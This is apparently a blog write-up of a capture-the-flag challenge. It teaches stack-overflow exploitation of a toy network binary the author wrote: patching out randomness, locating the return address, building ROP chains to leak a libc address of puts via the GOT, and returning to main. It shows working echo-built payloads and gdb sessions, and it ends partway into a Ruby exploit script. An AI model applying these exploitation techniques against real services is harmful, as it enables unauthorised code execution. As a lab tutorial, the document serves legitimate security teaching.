Hey all!
My husband’s company recently did an internal (commercial) CTF, and as a CTF nerd I got suckered into helping him. I thought one of the challenges had a pretty interesting solution - at least, something I hadn’t done before - and I thought I’d do a little write-up!
Because it’s a commercial CTF, I wrote my own vulnerability binary, which you can grab here. It’s much, much simpler, but has all the components I wanted. They also provided libc.so
, but since I’m not actually running the challenge, you can just use your own copy.
(Note that I’m running the BSidesSF CTF again this spring, and will probably gussy up this challenge a bit and throw it in - don’t let a good challenge go unwasted!)
The challenge
The CTF challenge was a binary that listens on a network port with a pretty straight-forward stack buffer overflow in a call to fgets()
.
The difficult part (for me) is that the binary is very simple - there aren’t a lot of libc imports. When I design a CTF challenge, I usually find an excuse to call popen
or system
or something so the player has access to that address. But nothing like that in this one!
So we we have is:
- A simple binary
- A bit of randomness to make simple exploits difficult
- A provided copy of
libc.so
- The overflow is in
fgets()
(which allows NUL bytes - see my recent rant about NUL bytes - The binary has no stack-overflow protection (ie, compiled with
-fno-stack-protector
or a time machine) - The binary is not compiled as a position-independent executable (PIE) - that means there’s no ASLR in the main binary and we can rely on static addresses (but there IS ASLR in the
libc.so
library) - we’ll talk about why that matters - The binary has symbols, so we know what functions are called
Let’s see how I approached it!
De-randomizing
(If you don’t care about how to disable the randomness for local testing, skip to the next section!)
If you run the binary I made, it asks you to type in a certain number of characters:
$ ./goto-zero
Enter 11 characters then press enter!
^C
$ ./goto-zero
Enter 14 characters then press enter!
I hate randomness when I’m hacking! If possible, I want to be able to test without having to fuss with that sorta thing. So one of the first things I did was find the code that randomizes the number. To do that, you can use Ghidra, IDA, objdump -D
. I used objdump -D
, which is the worst option, but is quick and free and easy to demonstrate (I also use -M intel
because I prefer Intel syntax).
Basically, disassemble the binary and search for the word “rand”, and it’ll lead you to the top of the main()
function:
$ objdump -M intel -D goto-zero
[...]
4011e1: bf 00 00 00 00 mov edi,0x0
4011e6: e8 95 fe ff ff call 401080 <time@plt>
4011eb: 89 c7 mov edi,eax
4011ed: e8 5e fe ff ff call 401050 <srand@plt>
4011f2: e8 a9 fe ff ff call 4010a0 <rand@plt>
Seeing time()
and srand()
called like that tells me they’re seeding the random number generator with the current time. The register edi
is the first argument to a function and eax
is the return value, so what you’re seeing is essentially srand(time(0));
.
What we’d like to do is get rid of all that. The easiest thing is to patch the executable to get rid of the time()
call altogether, and just do srand(0)
. You can do that by finding the sequence of raw bytes in the binary (the middle column in that listing), and “removing” the ones you don’t want (by replacing them with 90 90 90 ...
which is nop nop nop ...
).
In this case, we want to remove call 401080
(which corresponds to the bytes e8 95 fe ff ff
) and the following mov edi, eax
(e9 c7
). That way, instead of passing 0 into time()
, it’ll pass 0 into the following function, srand()
, and therefore always call srand(0)
, which means we’ll always get the same random sequence (a lot of what we do when modifying binaries is finding ways to use the tools we have to do something a little differently - we’ll see that more later).
Open the binary in a hex editor of your choice (I’m using xxd -g1 < goto-zero > goto-zero.hex
), search for that sequence, and replace it with 90 90 90 90 90 90 90
).
So:
000011e0: ff bf 00 00 00 00 e8 95 fe ff ff 89 c7 e8 5e fe ..............^.
000011f0: ff ff e8 a9 fe ff ff 89 c2 89 d0 c1 f8 1f c1 e8 ................
Becomes:
000011e0: ff bf 00 00 00 00 90 90 90 90 90 90 90 e8 5e fe ..............^.
000011f0: ff ff e8 a9 fe ff ff 89 c2 89 d0 c1 f8 1f c1 e8 ................
Then save it as a binary file again, if your hex editor doesn’t automatically do that (with xxd
, you can use xxd -g1 -r < goto-zero.hex > goto-zero.patched
). You’ll probably want a different name, because you’ll eventually need the old version. Also, don’t forget to chmod +x
the new binary!
If you do all that, then objdump goto-hex.patched
, you will see that the code has changed:
$ objdump -M intel -D goto-zero.patched
[...]
4011e1: bf 00 00 00 00 mov edi,0x0
4011e6: 90 nop
4011e7: 90 nop
4011e8: 90 nop
4011e9: 90 nop
4011ea: 90 nop
4011eb: 90 nop
4011ec: 90 nop
4011ed: e8 5e fe ff ff call 401050 <srand@plt>
4011f2: e8 a9 fe ff ff call 4010a0 <rand@plt>
And when you run it, it should always pick the same number:
$ ./goto-zero.patched
Enter 14 characters then press enter!
^C
$ ./goto-zero.patched
Enter 14 characters then press enter!
^C
$ ./goto-zero.patched
Enter 14 characters then press enter!
Note that this won’t work against a remote server, because it won’t be disabled on their end. So you either have to eventually deal with the randomness, or run your payload over and over till it doesn’t crash. :)
I find that removing little annoyances (like randomization) while reverse engineering or exploit dev can save you a TON of mental anguish, and I always suggest looking for ways to make your working environment nicer!
Stack overflow
The first thing I do when I’m allowed to input text is to input a lot of text!
Let’s try:
$ ./goto-zero.patched
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Good job, BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
fish: Job 1, './goto-zero.patched' terminated by signal SIGSEGV (Address boundary error)
Usually that’s a darn good indicator that you have an overflow - likely a stack overflow, particularly if it’s a CTF :)
We can verify, though! We’re going to use gdb
- the GNU debugger! Here’s my config file, the important part is to use intel
syntax:
$ cat ~/.gdbinit
set disassembly-flavor intel
set pagination off
set confirm off
Here’s how you’d run goto-zero.patched
in gdb
(the -q
is just for less output, and I added some newlines for easier reading):
$ gdb -q ./goto-zero.patched
Reading symbols from ./goto-zero.patched...
(No debugging symbols found in ./goto-zero.patched)
(gdb) run
Starting program: /home/ron/projects/ctf/goto-zero/goto-zero.patched
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Enter 14 characters then press enter!
Then enter the same (long) input to see what happens:
[...]
(gdb) run
Using host libthread_db library "/lib64/libthread_db.so.1".
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good job, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()
We can see it crashed in main()
! That’s good news! To see the exact instruction it crashed on, you can use disas
(to disassemble the full function) or x/i $rip
(to eXamine the Instruction at rip
(the instruction pointer, ie, the current address):
(gdb) disas
Dump of assembler code for function main:
0x0000000000401196 <+0>: push rbp
0x0000000000401197 <+1>: mov rbp,rsp
0x000000000040119a <+4>: sub rsp,0x40
[...]
0x0000000000401279 <+227>: mov eax,0x0
0x000000000040127e <+232>: leave
=> 0x000000000040127f <+233>: ret
End of assembler dump.
disas
is often a lot of output, and doesn’t work without symbols, so I usually use the x/i
method:
(gdb) x/i $rip
=> 0x40127f <main+233>: ret
However you do it, we can see it crashes at ret
, which is attempting to return from main()
. What ret
specifically does is jump to the address on top of the stack. We can see that address with x/xg $rsp
(eXamine in heX, the Giant (64-bit integer) on top of the stack (rsp)):
(gdb) x/xg $rsp
0x7fffffffe1b8: 0x4141414141414141
So it’s trying to return to 0x41414141414141 (ie, executing code at memory address 0x4141414141414141) and crashing because that is not a valid address! That means we’re successfully overwriting the return address and taking control of the program’s execution!
Putting the exploit in a file
At this point, I’m often writing a program to start generating a file, then piping that file into the program. We’ll use echo
for now (note that the ''
in the middle is a visual separator, it doesn’t add anything to the file):
$ echo -ne 'AAAAAAAAAAAAAA\n''AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > test.bin
(gdb) run < test.bin
[...]
Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()
(gdb) x/xg $rsp
0x7fffffffe1b8: 0x4141414141414141
Finding the return address
Next, let’s try and figure out exactly where on the stack the return address is. We can disassemble and do math, or we can bruteforce it a bit:
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR' > test.bin
(gdb) run < test.bin
[...]
Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()
(gdb) x/xg $rsp
0x7fffffffe1b8: 0x5151515150505050
According to the top of the stack, we overwrote the return address with a series of (hex) 51
and 50
which, in ascii, is P
and Q
. That means that the return address is where the P
s and Q
s were, so that’s what we need to manipulate. If it’s not cleanly aligned (like you get 0x5251515151505050
), just add or remote single characters until you get there).
Note that there are tools that can automate this for you, such as pattern_create.rb
and pattern_offset.rb
from the Metasploit project, but for something you only really have to do once, I prefer just doing it by hand.
Verifying
We’re pretty sure we know where in that string the return address is, but I like to verify first by trying to return to a more obvious address like 0x1122334455667788
:
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO\x88\x77\x66\x55\x44\x33\x22\x11' > test.bin
(gdb) run < test.bin
[...]
Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()
(gdb) x/xg $rsp
0x7fffffffe1b8: 0x1122334455667788
Note that it’s backwards, because Intel processors are little endian - 0x1234
gets encoded to \x34\x12
. Look up “endianness” if you want to know more about that, but the important part is that integers are encoded into memory “backwards”.
I’m always super paranoid, and like to do one further test. There’s a certain machine language instruction, 0xcc
(in assembly it’s int 3
), which is called a “debug breakpoint”. If the program ever tries to execute the 0xcc instruction, it will crash with an obvious message (something like “breakpoint trap” or “SIGTRAP”). If the program is being debugged, it passes control to the debugger and you can inspect memory or troubleshoot in other ways.
It’s usually possible to find 0xcc in some executable section, so search your output for ` cc `:
$ objdump -M intel -D goto-zero.patched | grep ' cc '
401026: ff 25 cc 2f 00 00 jmp QWORD PTR [rip+0x2fcc] # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
40119e: 89 7d cc mov DWORD PTR [rbp-0x34],edi
As an important aside: see how the cc
instructions are in the middle of other instructions? That’s perfectly fine, the CPU has absolutely no awareness of where an instruction starts or ends (on Intel architectures, at least - on other architectures, instructions must be aligned). We’re going to use that later!
Another quick aside: this only works if the executable wasn’t compiled as a “position-independent executable” (or PIE). The easiest way to tell that is that the executable doesn’t start at address 0. That means when it’s loaded into memory, it’s always loaded at the same address. The same isn’t true for the stack or libc.so
, as we’ll see later.
Anyway, the two options for debug breakpoints are 0x401028
and 0x4011a0
. Because objdump -D
will mindlessly output assembly on non-executable sections, go check which sections those instructions are in:
[...]
Disassembly of section .plt:
0000000000401020 <puts@plt-0x10>:
401020: ff 35 ca 2f 00 00 push QWORD PTR [rip+0x2fca] # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: ff 25 cc 2f 00 00 jmp QWORD PTR [rip+0x2fcc] # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
40102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
[...]
Disassembly of section .text:
[...]
0000000000401196 <main>:
401196: 55 push rbp
401197: 48 89 e5 mov rbp,rsp
40119a: 48 83 ec 40 sub rsp,0x40
40119e: 89 7d cc mov DWORD PTR [rbp-0x34],edi
[...]
The first is in the .plt
, which is an executable section that is used to call external libraries (and one we’ll see a little later). The second is in the .text
section, which is where the bulk of the code is stored. Either will work perfectly fine, so let’s pick the one in main()
because it feels better to run code in main()
. We overwrite the return address with 0x4011a0
, encoded in little endian (I should also note that because this is a 64-bit amd64
executable (as opposed to a 32-bit x86
), addresses are 8 bytes long:
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin
$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?
Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGTRAP (Trace or breakpoint trap)
Crashing with SIGTRAP
is what we want to see! Note that your shell might show it a little differently, this is what it looks like in Bash:
$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?
Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@Trace/breakpoint trap (core dumped)
Worst case, a debugger will always show it:
(gdb) run < test.bin
Starting program: /home/ron/projects/ctf/goto-zero/goto-zero.patched < test.bin
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Enter 14 characters then press enter!
What is your name?
Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00000000004011a1 in main ()
For extra bonus points, if you can find the byte sequence eb f0
, that’s an infinite loop (it’s a 2 byte sequence that decodes to “jump backwards 2 bytes”), which lets you lock up an executable entirely. You can verify that a remote target is vulnerable by setting the return address to memory containing eb f0
, and then seeing if the session locks up (that’s also kinda rude if it’s not your server!)
Return-oriented programming (ROP)
So remember how we used a cc
instruction from the middle of another instruction? In this code:
40119e: 89 7d cc mov DWORD PTR [rbp-0x34],edi
This is the first tiny little piece of “return oriented programming”, or ROP, that we’re doing. But we’re going to do a lot more!
In the olden days, systems and binaries had executable stacks. That means that if you overflowed the stack and changed the return address, you could just send code along with the updated return address and jump to that code, and you’re basically done - you’re executing arbitrary code.
Thankfully, pretty much no application in the last 20 years ships with an executable stack, even CTF challenges typically don’t (a notable exception is Citrix ADC, which runs its entire network stack including protocol parsers in a root module with an executable stack - see my writeup for cve-2023-3519). That means we need another way to execute code that we want!
The trick folks found is to use code that is already loaded in memory and executable, but to use it in a way that nobody would expect. The core idea behind ROP is that you find little bits and pieces of code (called “gadgets”) to do complete little tasks, and have each one jump to the next one by chaining them together as return addresses.
Normally, you’re doing one of two things:
- Either “set a register to a value and then return to the next thing” (typically,
pop / ret
); or - Call an already-defined function to do a thing
Most of the time when using ROP, unless you’re getting super complex, you’re using little gadgets to set up arguments to a function, then you’re calling that function, and repeat (note that x86
and amd64
vary here - you don’t normally need to set up registers on x86
since arguments are passed on the stack, but that’s a bit beyond the scope here).
Calling conventions
So let’s talk function arguments!
Much earlier, when we saw time
/ srand
/ rand
, we saw arguments being passed in edi
(which is essentially rdi
):
4011e1: bf 00 00 00 00 mov edi,0x0
4011e6: e8 95 fe ff ff call 401080 <time@plt>
4011eb: 89 c7 mov edi,eax
4011ed: e8 5e fe ff ff call 401050 <srand@plt>
This is what’s known as a calling convention - specifically, the calling convention used by amd64 Linux (that I have to look up every time I do this). The first four arguments to any function are passed in: rdi
, rsi
, rdx
, then rcx
, which means if you want to call a function with, say, two arguments, the first goes into rdi
and the second goes into rsi
.
For each of those arguments, we need to find a way to set it to a value then return again. Since you’re controlling the stack already, the easiest way to do that is with pop <reg>
followed by ret
.
Depending on how big the binary is, it might be easier or harder to find clean versions of these. Sometimes you’ll find pop rsi / <do a few irrelevant things> / ret
. Sometimes you’ll need to chain together multiple gadgets to do a single thing. It can get very tricky, but CTFs will usually give you the tools you need.
Another thing to mention is: there are tools that will find these for you. I’ve never personally used one, though probably I should - I just look for the right sequences by hand, normally they’re pretty obvious (don’t forget to look inside other instructions, though!).
Our first ROP!
Let’s look for a pop rdi / ret
instruction! We can assemble and disassemble a little program using nasm
to figure out what we’re looking for:
$ cat test.asm
bits 64
pop rdi
ret
$ nasm -o test.bin test.asm
$ hexdump -C test.bin
00000000 5f c3 |_.|
$ ndisasm -b64 test.bin
00000000 5F pop rdi
00000001 C3 ret
So basically, we need a 5f
, followed by c3
(but not necessarily adjacent). That sequence is found quite commonly at the end of functions, so you’ll usually be able to find it pretty easily. In the toy challenge I made, I just added one after main
so you don’t really have to search:
40127f: c3 ret
401280: cc int3
401281: 5f pop rdi
401282: c3 ret
So let’s take our payload from earlier, and instead of the debug address we’ll use the pop rdi
instruction as the return address (0x401281), followed by a value that will go into rdi
(0x1234567812345678). Once 0x1234567812345678 is popped into rdi
, the ret
will execute and whatever is next on the stack is the next return address. For that, we’ll use our debug breakpoint from earlier (0x4011a0).
All put together (once again using ''
as a visual separator), we get:
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x78\x56\x34\x12\x78\x56\x34\x12''\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin
Then run it in a debugger:
(gdb) run < test.bin
[...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00000000004011a1 in main ()
Crashing at a SIGTRAP
means we’re still ending with our debug statement - that’s good news! If you’re getting a SIGSEGV
, that means you’re ending up at the wrong place. Inspecting the address you’re at (x/i $rip
) and the top of the stack (x/xg $rsp
) might give you hints.
If it worked, we can use print/x
to print the register in heX to check what’s in rdi
:
(gdb) print/x $rdi
$1 = 0x1234567812345678
We did it!
What are we doing here?
Okay, now what are we actually trying to do?
We’re trying to get code execution, but how? We mentioned that you can set up arguments and then call functions. But what functions can we actually call?
Because our binary isn’t compiled with PIE
, we have a menu of functions that we can call, and we can see it with objdump -T
:
$ objdump -T ./goto-zero.patched
./goto-zero.patched: file format elf64-x86-64
DYNAMIC SYMBOL TABLE:
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.34) __libc_start_main
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) puts
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) printf
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) srand
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) fgets
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) getchar
0000000000000000 w D *UND* 0000000000000000 Base __gmon_start__
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) time
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) setvbuf
0000000000000000 DF *UND* 0000000000000000 (GLIBC_2.2.5) rand
0000000000404060 g DO .bss 0000000000000008 (GLIBC_2.2.5) stdout
0000000000404070 g DO .bss 0000000000000008 (GLIBC_2.2.5) stdin
0000000000404080 g DO .bss 0000000000000008 (GLIBC_2.2.5) stderr
There’s really not much there. That’s a problem. If we want to run code, we need to be able to make an arbitrary syscall, or write a file (open
/ write
), or run a command (system
), or allocate executable memory (mmap
), or something else fun. None of those functions are what I’d call “fun”. So where do we find fun functions?
We find fun functions in libc.so
, which unfortunately IS compiled with PIE
, so we can’t just jump to it - every time the binary starts, it’s loaded to a new address.
However, PIE only means we change where we load something into memory, not what we load into memory. The layout of libc.so
will always be the same once it’s loaded. That means if we can find one thing in libc.so
, we can use the magic of math to find every thing.
In other words, our goal is to leak one libc.so
memory address. Then suddenly, we have access to every function and gadget in libc.so
!
Leaking an address
We do, thankfully, have a function that can print stuff. Several, actually! puts()
is probably the easiest. As usual, I like to test things before I actually do them, so let’s look at how to test it.
Testing our leak
The first argument to puts
is a string that will be printed. That means we want to set rdi
to a string that, if output, would stand out.
Let’s use our pop rdi / ret
gadget again, but this time instead of a recognizable number, we’ll put this memory address into rdi
:
(gdb) x/s 0x402010
0x402010: "Enter %d characters then press enter!\n"
That’ll definitely stand out! So now our call stack is:
pop rdi / ret
(0x401281)- Our string (0x402010)
Next, we need to call puts()
. We can find the indirect call to puts()
in the .plt
section:
0000000000401030 <puts@plt>:
401030: ff 25 ca 2f 00 00 jmp QWORD PTR [rip+0x2fca] # 404000 <puts@GLIBC_2.2.5>
401036: 68 00 00 00 00 push 0x0
40103b: e9 e0 ff ff ff jmp 401020 <_init+0x20>
So the third thing we put on the stack is that address - 0x401030. Now our stack is:
pop rdi / ret
(0x401281)- Our string (0x402010)
puts()
(0x401030)
The final thing is our old friend the debug breakpoint - that way we can make sure everything is going right - 0x4011a0. So here’s our final stack:
pop rdi / ret
(0x401281)- Our string (0x402010)
puts()
(0x401030)- Debug (0x4011a0)
So now encode that all into our payload, remembering that each address is encoded into 8 backwards (little endian) bytes:
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x10\x20\x40\x00\x00\x00\x00\x00''\x30\x10\x40\x00\x00\x00\x00\x00''\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin
$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?
Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@Enter %d characters then press enter!
fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGTRAP (Trace or breakpoint trap)
Well there we go! We printed out some arbitrary memory and then hit a debug breakpoint!
Do you know what else lives in arbitrary memory? Memory addresses! Remember what we needed to call a libc.so
function? A memory address!
Let’s look at that .plt
thing again.
Reading the linking table
Since we could call puts()
from our own binary, it’s somewhat obvious that our binary has libc.so
addresses somewhere! Otherwise, it wouldn’t know where to go.
The way linking and imports and stuff actually work is kinda complex - the book Practical Binary Analysis explains it better than most - but suffice to say that we can find libc.so
addresses in the non-PIE binary we’re running if we know where to look.
Once again, non-objdump
tools are much better at displaying these addresses, but here’s the .plt
entry for puts
:
0000000000401030 <puts@plt>:
401030: ff 25 ca 2f 00 00 jmp QWORD PTR [rip+0x2fca] # 404000 <puts@GLIBC_2.2.5>
401036: 68 00 00 00 00 push 0x0
40103b: e9 e0 ff ff ff jmp 401020 <_init+0x20>
The first line does some math to reference a different part of the binary. objdump
helpfully does that math and says it’s 0x404000. That’s the address where the actual puts
address is stored, but with a little twist: it’s only there after it’s called - the linking is done opportunistically (see Practical Binary Analysis for all the details).
When you first run the executable, before doing anything, we can print the data at 0x404000:
(gdb) run
[...]
Enter 14 characters then press enter!
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7ec5e11 in __GI___libc_read (fd=0, buf=0x4056b0, nbytes=1024) at ../sysdeps/unix/sysv/linux/read.c:26
26 return SYSCALL_CANCEL (read, fd, buf, nbytes);
(gdb) x/xg 0x404000
0x404000 <puts@got.plt>: 0x0000000000401036
It stores 0x401036, which is an address in the binary itself - not in libc.so
. But if we let the puts()
run and then inspect it, it’s changed:
(gdb) run
[...]
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7ec5e11 in __GI___libc_read (fd=0, buf=0x4052a0, nbytes=1024) at ../sysdeps/unix/sysv/linux/read.c:26
26 return SYSCALL_CANCEL (read, fd, buf, nbytes);
(gdb) x/xg 0x404000
0x404000 <puts@got.plt>: 0x00007ffff7e3c0a0
And there’s a libc.so
address! You’ll recognize them because they usually start with 0x7f.
So now, let’s leak that address!
Leaking the address
Now all we have to do is take the most recent exploit we wrote, and instead of printing off “Enter %d characters then press enter!”, we print off 0x404000! It’s not going to be pretty, because it’s binary, but it should work.
Let’s update that call stack from earlier:
pop rdi / ret
(0x401281)- The address we want to leak (0x404000)
puts()
(0x401030)- Debug (0x4011a0)
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x00\x40\x40\x00\x00\x00\x00\x00''\x30\x10\x40\x00\x00\x00\x00\x00''\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin
$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?
Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@�Q�V
fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGTRAP (Trace or breakpoint trap)
Notice the �@�Q�V
at the end? That’s the address of puts
in libc.so
(and, as such, it changes every time)! We can see it better with hexdump
:
$ ./goto-zero.patched < test.bin | hexdump -C
00000000 45 6e 74 65 72 20 31 34 20 63 68 61 72 61 63 74 |Enter 14 charact|
00000010 65 72 73 20 74 68 65 6e 20 70 72 65 73 73 20 65 |ers then press e|
00000020 6e 74 65 72 21 0a 57 68 61 74 20 69 73 20 79 6f |nter!.What is yo|
00000030 75 72 20 6e 61 6d 65 3f 0a 0a 47 6f 6f 64 20 6a |ur name?..Good j|
00000040 6f 62 2c 20 42 42 42 42 43 43 43 43 44 44 44 44 |ob, BBBBCCCCDDDD|
00000050 45 45 45 45 46 46 46 46 47 47 47 47 48 48 48 48 |EEEEFFFFGGGGHHHH|
00000060 49 49 49 49 4a 4a 4a 4a 4b 4b 4b 4b 4c 4c 4c 4c |IIIIJJJJKKKKLLLL|
00000070 4d 4d 4d 4d 4e 4e 4e 4e 4f 4f 4f 4f 81 12 40 a0 |MMMMNNNNOOOO..@.|
00000080 d0 98 ca 12 7f 0a |......|
See how (other than the newline - 0a
) it ends with, in reverse order, 0x7f12ca98d0a0
? If we check the symbol exports for /lib64/libc.so
, we’ll see that the address for puts()
ends with the same number:
$ objdump -T /lib64/libc.so.6 | grep puts
00000000000840a0 w DF .text 0000000000000206 GLIBC_2.2.5 puts
That’s a very good sign!
If we do some math, 0x7f12ca98d0a0 - 0x840a0 = 0x7f12ca909000
, which is the address where libc.so
was loaded on that particular execution. Now we can use that to figure out the address of any other libc.so
function starting from that base address and adding the offset!
The final return
Okay, where do we want to return after we’ve leaked the address?
This is what took me a bit of time, and where I found a technique that I’d never used before (though I betcha every other CTF player has) - we can return to the top of main()
and let the program have its Groundhog Day - it starts from the top, and as far as it knows, nothing has happened. You can just exploit it again, but this time we know an address in libc!
Here’s our final ROP stack (for now):
pop rdi / ret
(0x401281)- The address we want to leak (0x404000)
puts()
(0x401030)main()
(0x401196)
Let’s run it:
$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x00\x40\x40\x00\x00\x00\x00\x00''\x30\x10\x40\x00\x00\x00\x00\x00''\x96\x11\x40\x00\x00\x00\x00\x00' > test.bin
$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?
Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@Enter %d characters then press enter!
Enter 14 characters then press enter!
What is your name?
Good job, ����fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGSEGV (Address boundary error)
See how it starts over, asks for the player’s name, etc? The whole program runs a second time. But this time, we’re ready!
And then it gets complicated…
So now, let’s make the binary into a network service:
$ ncat -e ./goto-zero.patched -k -l -p 1234
That’ll redirect stdin/stdout across the network like in a CTF challenge. We can connect to it and exploit it using nc
or ncat
:
$ nc -v localhost 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connected to ::1:1234.
Enter 14 characters then press enter!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
What is your name?
Good job, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
But we don’t really get output anymore. You can debug ncat
, but that gets kinda complicated (you need to set follow-fork-mode child
).
$ gdb -q --args ncat -vv -e ./goto-zero.patched -l -p 1234
[...]
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /usr/bin/ncat -vv -e ./goto-zero.patched -l -p 1234
In another terminal:
$ nc localhost 1234
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good job, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
And back in ncat
:
Thread 2.1 "goto-zero.patch" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff7db5740 (LWP 438720)]
0x000000000040127f in main ()
(gdb) x/xg $rsp
0x7fffffffe178: 0x4141414141414141
A couple notes on this:
- If you want to do it again, you have to restart
gdb
completely because it now thinks it’s the binary, notncat
- Because of how the binary is written, you can’t redirect a file, because the second the pipe closes the process terminates with
SIGPIPE
(the original binary isn’t like that - I didn’t notice till now and I don’t want to re-do all my examples!)
The rest of the owl
At this point, we can no longer just use a file and wave away the complexity - we need to read the libc.so
value and do some math.
I’m just going to reproduce my full exploit here and try to annotate it in comments. Enjoy!
# encoding: ASCII-8BIT
require 'socket'
# Use variables for host/port so we can change them to the real target later
IP = 'localhost'
PORT = 1234
s = TCPSocket.new(IP, PORT)
# This is a rally crappy function that reads one character at a time from the
# network stream until it ends with a value or disconnects - there are better
# ways to do this, but this works so whatever
def read_until(s, p, loud: false)
#puts "(Waiting for server to say \"#{p}\"...)"
data = ''
loop do
char = s.read(1)
if loud
print char
end
if char.nil? || char == ''
raise "Disconnected!"
end
data.concat(char)
if data.end_with?(p)
return data
end
end
end
# Our initial gadgets - name them so you don't get confused later!
POP_RDI_RET = 0x401281
PUTS_PLT_ENTRY = 0x404000
PUTS = 0x401030
MAIN = 0x401196
DEBUG = 0x4011a0
# Read the initial banner
